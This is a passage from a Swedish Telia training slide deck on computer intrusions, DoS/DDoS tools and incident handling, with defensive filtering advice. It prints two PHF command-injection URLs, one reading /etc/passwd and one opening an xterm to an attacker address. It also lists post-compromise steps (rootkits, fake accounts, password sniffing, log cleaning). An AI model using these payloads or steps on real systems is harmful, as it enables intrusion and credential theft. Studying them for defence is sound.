Process

Data

Komponent

Dator

Nätverk

Inter-network

ResultatÖkadbehörighet

Röjdinformation

Förstördinformation

Tillgänglighetattack (DoS)

Stöld av resurs

HändelseAttack

Källa: A Common Language for Computer Security Incidents, Sandia Report [SAND98-8667] Howard, Longstaff

Page 48: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

48

Telia AB

Kartläggning av brister

Givet aktuellt operativsystemoch de startade tjänsternagörs en sökning.

Alternativa webbplatser:• www.rootshell.com• www.securityfocus.com• www.packetstorm.securify.com• www.insecure.org• www.geek-girl.com/bugtraq• www.ntbugtraq.com• www.technotronic.com• www.hackernews.com• c5.hakker.com

De verktyg som används har bl.a. hämtats från Internet. Innan de användssker en säkerhetsgranskning och ev. läggs vissa specialfunktioner in.

Page 49: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

49

Telia AB

PHF-brist

• Äldsta bristen• Vanligaste bristen• CGI-program• Utnyttja ett exempelscript

• Exekverade godtyckligakommandon:

•hämta konfigurationsfiler•öppna terminalfönster

Detta visar hur en säkerhetsbrist används som ett av stegen för att ta sig in ien webbserver.

PHF-bristen är en av de äldsta bristerna som finns för webbservrar. Dengällde NCSA HTTPD 1.5 och Apache v1.0.3.

Bristen är ett exempelprogram för CGI (Common Gateway Information)som användes för att prova webbformulär. Då scriptet använder funktionen”escape_shell_cmd()” för att kontrollera indata var den sårbar för en vanligattack där man mixtrade lokalt med funktionen. Själva bristen var attscriptet inte kollade indata tillräckligt noga. Om man bifogade ”newline” (\neller x%0a) kunde man ”hoppa ur” scriptet och lura det att köra godtyckligtkommando efter dessa tecken.

Exempel: För att plocka hem lösenordsfilen skrevs följande sträng:

http://www.offer.net/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Exempel: För att öppna en xterminal till dig själv:

http://www.offer.net/cgi-bin/phf?Qalias=x%0a/usr/openwin/bin/xterm%20-display%20193.12.32.2:0.0%20&

Mer info: http://oliver.efri.hr/~crv/security/bugs/mUNIXes/httpd3.html

Page 50: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

50

Telia AB

Buffer overflow

u Absolut vanligaste sättet attskaffa sig åtkomst till ettsystem

u Förväntar sig kort ”input”u Sänder stor ”input”u Förstöra stack/heap

u Program avbrytsu Hackern tar kontroll

u överbelastningsattack (DoS)u rootåtkomst

Kalle fr0jes

Serverprogram:

buffer

Infogad kod

Return addr.

STACK

Stack Frame

Buffer Overflowattack

Modifieraåterhoppsadress

Infoga egen kod

nopnopnop

I utgåva 49 av Phrack publicerade AlephOne artikeln ”Smashing The StackFor Fun And Profit”. Med denna artikel introducerades ”buffer overflow”-attacker. I artikeln visades hur dåligt skrivna program kan användas för attbryta sig in i datorsystem. Detta var i november 1996 och attacken ärfortfarande ”hetpotatis”.Majoriteten av de advisories som utfärdades avCERT under 1999 handlade om ”buffer overflows”.

Denna attack syftar att man ger mer data är förväntat till en buffer/array, såatt man går utanför allokerat minne, t.ex orsaka ett ”segmentation fault”.Vanligtvis kan man förknippa dessa operationer med strcpy(), strcat() ochsprintf().

”Attack”-koden är enkel och kräver ett fåtal bytes ”exec (sh)”. Denna kodfinns oftast resident i offrets/serveprogrammets adressrymd, de finns bl.a. Istandardbibliotek som libc och glibc. Den som attackerar behöver ”bara”hitta ett program med dålig ”bounds checking” och ge input > buffer size.Otaliga varianter finns - kreativiteten sätter gränserna.

Läs mer på http://www.2600.net/phrack/p49-14.html och http://immunix.org

Page 51: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

51

Telia AB

Etablera bas

u Installera ett rootkit.u Skaffa en reservväg, t.ex. ett användarkonto

som ser äkta ut.u Aktivera sniffers för att fånga lösenord till andra

system.u Städa undan efter dig.

u Vittja systemen när risken för upptäckt är minst

Page 52: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

52

Telia AB

Rootkit

En samling verktyg som används för att:u installera bakdörraru samla data via t.ex. sniffersu städa loggfileru byta ut kritiska systemprogram mot

”modifierade” varianter i syfte attu dölja att systemet har komprometteratsu få flera lösenord och större behörigheter

Ett rootkit ger inte hackern root-åtkomst men kräver att man är root för att kunna nyttja det fullt ut

Att installera ett rootkit är det sista steget på ett ”taget” system. Ett rootkitbestår av flera program som har funktioner som t.ex:

• rensar loggfiler (raderar eller snyggt städar upp i själva filen)

• skapa diskutrymmen på ”slackspace”

• trojanska hästar

• program som döljer din närvaro i systemet

• bakdörrar, eller reservvägar om du blir utslängd ochsystemadministratören täpper till det hål/brist du ursprungligen tog dig in.

Det finns flera olika rootkit med skiftande kvalitet och karaktär.

För att ”städa upp” efter ett intrång där man misstänker att ett rootkitanvänds, måste man installera om systemet från allra första början, dvs frånscratch.

Page 53: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

53

Telia AB

Sniffers

u Ethereal, sniffit, linsniff, snoop, websniff, es m.fl.

u nätverksprotokollanalysator

u övervaka och spela in nätverkstrafik i realtid

u granska i efterhand

-- TCP/IP LOG -- TM: Tue Feb 9 22:38:56 -- PATH: local.offer.net(1310) =>system.offer.net(telnet)STAT: Tue Feb 9 22:46:14, 316 pkts, 255 bytes [DATA LIMIT]DATA:user(127)(127)(127)(127)(127)(127)(127)web: werk78: exec tcsh: pwd: ls

Ethereal är ett analysverktyg av nätverksprotokoll, eller en sniffer.

Med detta verktyg (och liknande) kan du fånga och spela in nätverkstrafik irealtid.

Ett bra tips är att spela in alla uppkopplingar för att fånga ip-adress+userid+password

Page 54: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

54

Telia AB

HACKERTRENDER

Page 55: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

55

Telia AB

Trender: Hackers

u Antalet ökaru Wannabies (”peka och klick”-verktyg)u Organiserad brottslighet (Portugese Bank)u Hacktivism

Utvalda offer:• Privatpersoner (mjuka certifikat, konton/lösenord)

• ”Lovliga” företag (KI, Telia, Shell, HM, Toys’ß ’us)

• Företag (generellt)

Page 56: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

56

Telia AB

Trender: Metoder

u Nukes

u Trojaner (Netbus, BO2K, Donald Dick, ..)

u Distribuerade attacker (TFN, Tfnk2K,Stacheldraht, Shaft)

u samt ”Traditionella” metoder som att utnyttjabrister, ex. Bind, sunRPC, Qpop,...

Aktuellt just nu!• DDoS• Bind• Root compromises• CCS (html)

Page 57: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

57

Telia AB

Grundbultar

u Förhindra att säkerhetsincidenter inträffaru Stoppa och begränsa inträffad säkerhetsincidentu Återställau Uppföljning

u Ta tag i händelserna!

u Visa inåt och utåt att manu reagerar

u ageraru vidtar motåtgärder

Avskräckande

Page 58: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

58

Telia AB

Förberedelser

u Förhindra att säkerhetsincidenter inträffaru Regler och riktlinjer (IT-säkerhetspolicy)u Anvisningar och checklistor

u Säkra systemen och externa kopplingar

u Följa upp loggfileru Ordning och reda (ex. dokumenterat nätverk- och systemmiljö)

u Hålla sig à jouru Säkerhetsbrister, uppdateringar, nyheter

Förberedelse

Page 59: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

59

Telia AB

Förbered för incidenter

u Fastställ en accepterad terminologiu Fastställ incidentflöde/strukturu Kvalificera säkerhetsincidenteru Bestäm toleransnivåu Skapa en organisation för att hantera

säkerhetsincidenter:u Syfte Målu Ansvar och roller Verksamhetsområde

u Avgränsningar Rapportering

u Skapa en utvecklings- och handlingsplan

Page 60: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

60

Telia AB

Våra hackers and phreakers

Page 61: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

61

Telia AB

DoS

”Denial-of-Service”-attacker

Överbelastningsattacker

Page 62: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

62

Telia AB

Överbelastningsattacker

Syftet:u ??

Hur:u Sända felaktiga data eller data i fel formatu Sända för mycket data

Resultat:u System stannaru System eller applikationer loopar och tar all processorkraft

Överbelastningsattacker har funnits några år och har det senaste halvåretblivit alltmer kraftfulla. Nya program gör att det är betydligt svårare attupptäcka förövaren.

Page 63: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

63

Telia AB

Handskakning

u TCP 3-vägs handskakning

Syn (A, ISNA)

Ack (B, ISNB)

Syn (B, ISNB)Ack (A, ISNA),

Vid en normal uppkoppling sker följande steg.

Inititor sänder SYN-paket med sitt ISN (Initial Sequence Number). Dettaanvänds för att kontrollera att inga paket tappas under sessionen. ISN kanskapas helt slumpmässigt eller på ett mindre säkert sätt (fast).

Mottagaren sänder ett ACK (acknowledgement) till Initiator samt ett egetSYN-paket med stt ISN.

Initiator kontrollerar ACKets ISN och sänder i sin tur ett ACK påmottagarens SYN.

Då paket sänds ökas ISN hela tiden med ett (1) och hoppas ett nummer överkan mottagaren påtala att paket nr X ej togs emot och omsändning kan ske.

Page 64: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

64

Telia AB

SYN-flooding

u Sänder SYN till målsystem med falsk avsändaradress

u Målsystem måste svara på alla SYNu Fyller upp målsystemets köer med SYNsu Målsystemet överbelastas och inga ”äkta” anslutningar tillåts

u Målsystem kan ”reda ut situationen” mha Timeout

Syn (X, ISNX)

Syn (X, ISNX)

Syn (X, ISNX)

Ack (X, ISNx),

SYN-attack, eller synkroniseringspaket används av TCP/IP för att skapasessioner. Klienten skickar ett SYN-paket till servern som i sin tur skapar ensession vilket bekräftar att SYN-paketet gått fram.

Servrar av alla slag kan hantera en stor mängd sessioner men det finns enbegränsning. Varje session är igång så länge som en server tycker att denanvänds, därefter stängs den ned. Denna tid bestäms till en Timeout-tid.

Genom att sända en kontinuerlig ström av SYN-paket kan man snabbt göraslut på alla sessioner hos en server.

Mycket av den programvara som finns för servrar klarar att snabbt stänganed sessioner som inte har någon trafik. Om man, då man sänder SYN-paketoch även förfalskar avsändaradressen t.ex. så att det blir samma adress somden aktuella servern genereras ännu mera störande trafik.

Detta kan dock förhindras av anti-spoof"-filter som hittar förfalskadeavsändaradresser. Dessa filter läggs in i bl.a. routrar hos Internetleverantöreroch företag.

Page 65: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

65

Telia AB

Syn4K

u Testar om målsystemet står emot en attacku Använder falsk avsändaradressu Sänder SYN-floder på en eller flera portaru Varje SYN-pakets storlek 4Kb

URL: http://www.jabukie.com/Unix_Sourcez/synk4.c

Page 66: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

66

Telia AB

# netstat -tctcp 0 1 172.16.200.3:80 135.4.201.4:1422 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1426 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1782 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1786 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:8042 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:8046 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1002 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1006 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1362 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1366 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:1722 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:1726 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:2082 SYN_RECVtcp 0 1 172.16.200.3:80 135.132.201.4:2086 SYN_RECVtcp 0 1 172.16.200.3:80 135.4.201.4:2442 SYN_RECV

SYN-flooding sett från Netstat

Med programmet Netstat kan man ”se” hur en SYN-flooding ser ut.

Page 67: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

67

Telia AB

Smurf-attack

u Ping sänds till broadcast-adresser (”ICMP Echo Request”-paket

u Avsändaradressen sätts till ”offrets”

u Ping sprids till alla system i nätverket, som svarar till offretu Offret dränks i Ping-svar (”ICMP Echo Reply”-paket)

Broadcast PING address xxx.xxx.xxx.255Broadcast PING address yyy.yyy.yyy.255 … … … … … Broadcast PING address nnn.nnn.nnn.255

Kusiner:• Fraggle• PapaSmurf

Responses!!

Responses!!

Ethernet-nätverk använder sig av en broadcast-adress för att sända ut paket till en stormängd mottagare, utan att behöva adressera var och en av dessa. Förslagsvis sänds dessatill routrar och andra nätkomponenter.

I en smurf-attack sänds ping-paket till broadcast-adressen på ett eller flerastörre nätverk. Avsändaradressen sätts till det system man vill dränka i PING-svar, detgenereras max 255 svar per broadcast-adress.

Då varje enhet på nätverket svarar sänds svaret tillbaka till "offret" och dränkerdenna. Effekten brukar bli att "offrets" system lägger sig ned på rygg och sprattlar.

Denna attack kan ganska enkel stoppas genom filtrering. Det är inte "normalt" att sända enPing-förfrågan till en broadcast-adress. Det gör därför ingen skada att stänga av dennatrafik.

Page 68: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

68

Telia AB

Land / La Tierra

u Sänder ett SYN-paket där:u avsändaradress = mottagaradress = offrets ip-adressu avsändarport = mottagarport = öppen port hos offret

u Beror på dåligt implementerad IP-stack

u Skydd: Sätt filters i routers, brandväggar sominte tillåter att avsändaradress är samma sommottagaradress

La Tierra är en ”bättre” variant av Land

- kan attackera hela C-nät

- ange start- slutport

- ange antal loopar eller ”until dead” (forever)

- ange TCP-flaggor (fin, syn, reset, push, ack, urgent)

- ange TTL, window-size, sekvensnr (ISN) och meddelandetyp

- kan använda namn istf ip-adresser

- kan använda en ascii-filer som indatafil innehållande ip-adresser

Page 69: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

69

Telia AB

Distribuerad DoS

u Knäck ett systemu Installera DDoS-verktygu Mål 1: Placera ut serverprogramu Mål 2: Placera ut klientprogramu Mål 3: Etablera samband / kommunicerau Mål 4: Attackera

Page 70: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

70

Telia AB

Tidsschema DDoS

u Analys av programkod Dave Grittich aug-99u Överlämnades till CERT som gjorde egen analysu CERT fann attackmönster från juli-99u CERT misstänkte Y2K-attack -> locket påu Officiell release av TFN i sept-99u CERT Advisory 99-11-18 (http://www.cert.org/incident_notes/IN-99-07.html)

u FIRST EWT i dec-99u TFN ’in the wild’

Page 71: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

71

Telia AB

Trinoo

27665/tcp(telnet)

27444/udp 31335/udp

MASTER

MASTER

MASTER

Attacker

CLIENT CLIENT

Genom att ta över flertalet system och installera master- och slavprogram idessa kan man köra en DDoS-attack. Slavdatorerna är de som gör självaarbetet med att försöka "sänka" målsystemet. Master-systemen styrslavdatorerna och kan t.ex. styra mot olika målsystem. Hackaren i sin tur,sitter och styr Mastern.

Detta förfarande medför att den är "bökigare" att finna förövaren då manmåste spåra i flera olika steg. System för system.

Hackern kontaktar Master-system genom att ange ”rätt” lösenord. Detta föratt förhindra att andra använder/missbrukar ”hans” system.

En Master kan kontakta Klienter när som helst genom att sända strängen l44i ett udp-paket.

Mastern kan kontrollera om de ”tagna” klienterna fortfarande är i hans ägogenom att sända en broadcast med strängen PONG i ett udp-paket.Klienterna svarar Mastern genom att sända strängen HELLO/tcp på port27665. Mastern upprättar komm.kanal på port 27444/udp och Klientersvarar på port 31335/udp.

Vid attack sänder varje Master en signal till Klienterna att starta attacken.Signalen kan vara flera udp-paket à 4 bytes innehållande nollor. Klienternasänder stora mängder udp-paket till offret på slumpvis valda portar. De IP-adresser som är offer finns lagrade i en fil på Mastern som är ”krypterad”med Ceasar Cipher.

Page 72: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

72

Telia AB

TFN

Any ”terminal”protocol

icmp

CLIENT

CLIENT

CLIENT

Attacker

DAEMONS DEAMONS

icmp

ICMP flood, SYN flood, UDPflood, and "Smurf" styleattacks

TFN fungerar på liknande som Trinoo och kan använda sig av ICMP, TCP och UDP för attinitiera en SYN-flood eller Smurf-attack. Skillnanden mellan TFN och Trinoo är attkommunikationen mellan Masters och slavar sker i TFN med "ICMP Echo Reply".Eftersom dessa paket är vanliga att använda även för andra applikationer/tjänster så är detväldigt svårt att blockera dessa paet. Om man gör detta är det stor risk att man blockerar enstor del av den ordinarie trafiken. Då nätverksövervakningsverktyg inte kontrollerarstorleken på dessa ICMP-paket kan det vara svårt för hackern att övervaka trafiken mellanMaster och slavarna.

Page 73: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

73

Telia AB

TFN2K

Randomencryptedudp/tcp/icmp

MASTER

MASTER

MASTER

Attacker (”Client”)

AGENTS AGENTS

TCP/SYN, UDP, ICMP/PING, orBROADCAST PING (SMURF)packet flood

Randomencryptedudp/tcp/icmp

Fungerar som tidigare fast på NT-plattform.

Klienterna /agenterna kan vara W95-system.

Page 74: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

74

Telia AB

Stacheldraht

16660/tcpencrypted

icmp

HANDLER

HANDLER

HANDLER

Attacker (”Client”)

AGENTS AGENTS

65000/tcp,icmp

ICMP flood, SYN flood, UDPflood, and "Smurf" styleattacks

Stacheldracht är tyska och betyder taggtråd. Denna tyska variant av DDoS är merasofistikerad

då den är en kombination av Trinoo och TFN. Den krypterar kommunikationen mellanhackern och befintliga Masters, detta i syfte att ingen annan ska kunna ta över eller lånadessa system.

Krypteringen hjälper även till att skydda mot upptäckt. Slavarna kan själva ladda ned enuppdaterad Stacheldracht-progamvara och installera denna.

Page 75: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

75

Telia AB

Skyddsåtgärder

u Förhindra att ditt nätverk används som källa för attack:u Aktivera filter på dina nätsegment

u Tillåt endast utgående paket med avsändaradress inom ditt nätblock / dina nätsegmentu Förhindra utgående trafik som har ”privata adresser”u Förhindra att man använder dig som förstärkare, dvs nyttjar din broadcast, dvs tillåt ej

”direct broadcast”u Hindra inkommande paket med avsändaradress inom ditt nätblock.

u Stäng av ”IP direct-broadcast”u Stäng av ”ICMP echo reply” till ”broadcast”-adresseru Detta skyddar mot flera olika DoS-attacker

FILTER:

ftp://ds.internic.net/internet-drafts/draft-ferguson-ingress-filtering-03.txt

För att förhindra en ”bounce”-attack bör man: Stänga av ”directed broadcasts” till nät medmed 5 system eller fler.

• Cisco: Interface command “no ip directed-broadcast”

• Proteon: IP protocol configuration “disable directed-broadcast”

• Bay Networks: Set a false static ARP address for broadcast address

Eventuellt kan man använda ACL (access control lists) för att förhindra ”ICMP-echo” tillditt nätverk. Försvårar dock felsökning.

Stäng av ”ICMP-echo reply” till broadcast-adresser. Detta är godkänt enligt RFC-1122avsnitt 3.2.2.6 “An ICMP Echo Request destined to an IP broadcast or IP multicast addressMAY be silently discarded.”

LÄNKAR:Zombie Zapper är ett program som eliminerar slav- och masterprogram i systemenURL: http://razor.bindview.com/tools/index.html

FBI har tagit fram ett verktyg som kontrollerar om det finns Master- eller slavprogram på ditt system URL: http://www.fbi.gov/nipc.trinoo.htm

Den person som nog gjort mest för att analysera och varna oss om dessa program ärDavid Dittrich på Washington University. Hans analyser och "white papers" finns påURL: http://staff.washington.edu/dittrich/misc.URL: http://staff.washington.edu/dittrich/misc/sickenscan.tar

Page 76: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

76

Telia AB

Referenser

u CERT/CC (URL: www.cert.org )u SANS (URL: www.sans.org)

u Federal Incident Response Capability (URL: www.fedcirc.llnl.gov )

u Datorrelaterade missbruk och brott - en kartläggning gjord av effektivitetsrevisionen, RRV1997:33, Riksrevisionsverket, ISBN: 91 7498 267 2

u Computer Security Incident Handling - Step by step, SANS Institute,1998u Intrusion Detection, Edward Amoroso, Intrusion.Net Books, 1999

u An Analysis of Security Incidents On The Internet, 1989-1995, John Howard, CERT/CCu Incidentorganisation och incidenthantering, Jimmy Arvidsson, Stockholms Universitet DSV/KTH

u Current and Future Danger: A CSI Primer on Computer Crime & Information Warfare, RichardPower, Computer Security Institute, 1999

u Hacking Exposed, McClure, Scambray, Kurtz, Osborne/McGrawHill (www.osborne.com/hacking)